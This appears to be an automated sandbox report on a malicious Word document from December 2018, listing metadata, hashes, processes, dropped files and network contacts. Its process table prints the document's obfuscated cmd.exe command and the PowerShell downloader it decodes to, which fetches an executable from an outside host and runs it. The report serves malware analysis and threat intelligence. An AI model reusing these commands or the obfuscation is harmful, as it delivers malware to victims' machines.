File name: | Chathamcollisionrepair.doc |
Full analysis: | https://app.any.run/tasks/f897c1e2-e4aa-4d7b-9b4f-24438fb163ee |
Verdict: | Malicious activity |
Analysis date: | December 18, 2018, 14:21:49 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1251, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Dec 18 09:01:00 2018, Last Saved Time/Date: Tue Dec 18 09:01:00 2018, Number of Pages: 1, Number of Words: 5, Number of Characters: 35, Security: 0 |
MD5: | 221B0DADB4F9720012B6DF51BCBF3641 |
SHA1: | 6FFA329E3770E28D1E80B887E888C86AE7C5510B |
SHA256: | D2CE1B4076F9F0674C01155E3A0C2F931DA8CA7CBB81C1049A597D8724179F87 |
SSDEEP: | 768:5+VucRFoqkp59YBvLdTv9ReVi4eFov5UHRFBZYr0nsGG2Cd9S+1o9Y:Qocn1kp59gxBK85fBZYkURS+a9Y |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
Title: | - |
---|---|
Subject: | - |
Author: | - |
Keywords: | - |
Comments: | - |
Template: | Normal.dotm |
LastModifiedBy: | - |
RevisionNumber: | 1 |
Software: | Microsoft Office Word |
TotalEditTime: | - |
CreateDate: | 2018:12:18 09:01:00 |
ModifyDate: | 2018:12:18 09:01:00 |
Pages: | 1 |
Words: | 5 |
Characters: | 35 |
Security: | None |
CodePage: | Windows Cyrillic |
Company: | - |
Lines: | 1 |
Paragraphs: | 1 |
CharCountWithSpaces: | 39 |
AppVersion: | 16 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | - |
HeadingPairs: |
|
CompObjUserTypeLen: | 32 |
CompObjUserType: | Microsoft Word 97-2003 Document |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2944 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Chathamcollisionrepair.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
1900 | c:\LfRWscp\jzcKOAbAt\BWDJOMYbuEn\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V/C"set zUI=;'aVi'=Gtr$}}{hctac}};kaerb;'ZNB'=CLN$;juS$ metI-ekovnI{ )00008 eg- htgnel.)juS$ metI-teG(( fI;'SUq'=fiO$;)juS$ ,Rmz$(eliFdaolnwoD.pvV${yrt{)sXu$ ni Rmz$(hcaerof;'exe.'+ttr$+'\'+pmet:vne$=juS$;'EoL'=QMX$;'008' = ttr$;'ErR'=VsO$;)'@'(tilpS.'sdd.31onixis=l?php.m2ke204o/oqnes-zer/moc.htsidnocsi//:ptth'=sXu$;tneilCbeW.teN tcejbo-wen=pvV$;'IVB'=STT$ llehsrewop&&for /L %J in (356,-1,0)do set FvI1=!FvI1!!zUI:~%J,1!&&if %J lss 1 call %FvI1:*FvI1!=%" | c:\windows\system32\cmd.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2660 | CmD /V/C"set zUI=;'aVi'=Gtr$}}{hctac}};kaerb;'ZNB'=CLN$;juS$ metI-ekovnI{ )00008 eg- htgnel.)juS$ metI-teG(( fI;'SUq'=fiO$;)juS$ ,Rmz$(eliFdaolnwoD.pvV${yrt{)sXu$ ni Rmz$(hcaerof;'exe.'+ttr$+'\'+pmet:vne$=juS$;'EoL'=QMX$;'008' = ttr$;'ErR'=VsO$;)'@'(tilpS.'sdd.31onixis=l?php.m2ke204o/oqnes-zer/moc.htsidnocsi//:ptth'=sXu$;tneilCbeW.teN tcejbo-wen=pvV$;'IVB'=STT$ llehsrewop&&for /L %J in (356,-1,0)do set FvI1=!FvI1!!zUI:~%J,1!&&if %J lss 1 call %FvI1:*FvI1!=%" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2336 | powershell $TTS='BVI';$Vvp=new-object Net.WebClient;$uXs='http://iscondisth.com/rez-senqo/o402ek2m.php?l=sixino13.dds'.Split('@');$OsV='RrE';$rtt = '800';$XMQ='LoE';$Suj=$env:temp+'\'+$rtt+'.exe';foreach($zmR in $uXs){try{$Vvp.DownloadFile($zmR, $Suj);$Oif='qUS';If ((Get-Item $Suj).length -ge 80000) {Invoke-Item $Suj;$NLC='BNZ';break;}}catch{}}$rtG='iVa'; | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2944 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRA74F.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2944 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\60887BFE.wmf | — | |
MD5:— | SHA256:— | |||
2944 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B85288BC.wmf | — | |
MD5:— | SHA256:— | |||
2336 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\AH2UYL8YCPX6ODAMFTI4.temp | — | |
MD5:— | SHA256:— | |||
2336 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:0C1DAA668BA499584B0AC7476368101E | SHA256:326CCA676EAA6C8A45F71B6239CC22D9F49085AB54229E1777D0E15C50EC13DA | |||
2944 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B70661B1.wmf | wmf | |
MD5:D03255B7CEBC84DF144838CEC1444CD5 | SHA256:28E7B88ED3E38E99DA28968A536FAA26CA389A86166B7AD09BB4FA02B27A8D4B | |||
2944 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:C0E05B10780841AE15969333DA0BFE18 | SHA256:8C88F01A0964845A6E238B57D62EF68368276FA649122C778F7D617F63C6E443 | |||
2944 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$athamcollisionrepair.doc | pgc | |
MD5:E74B02CDEE72B83CA75F7622A212B9DD | SHA256:E2236C93234B6687B865FD8E4D8C8509D6E356572B5172F182BDDCB22F8FACCF | |||
2944 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\64237FE7.wmf | wmf | |
MD5:1B5372CBFDF5EA27FA2E4D1B0ADA59FE | SHA256:8D121708145024C3BE39AC8DBE8844ADB923B654966FBC04F5BF297E87815E8C | |||
2944 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd | tlb | |
MD5:E90491F6BDAEE984309B9DB49D8F6080 | SHA256:571ED7F4E7FE66156501E80FF446AB36A23952B8A2CEE52AB90C8F3BA409FC95 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2336 | powershell.exe | GET | — | 185.231.155.12:80 | http://iscondisth.com/rez-senqo/o402ek2m.php?l=sixino13.dds | unknown | — | — | suspicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2336 | powershell.exe | 185.231.155.12:80 | iscondisth.com | — | — | suspicious |
Domain | IP | Reputation |
---|---|---|
iscondisth.com |
| suspicious |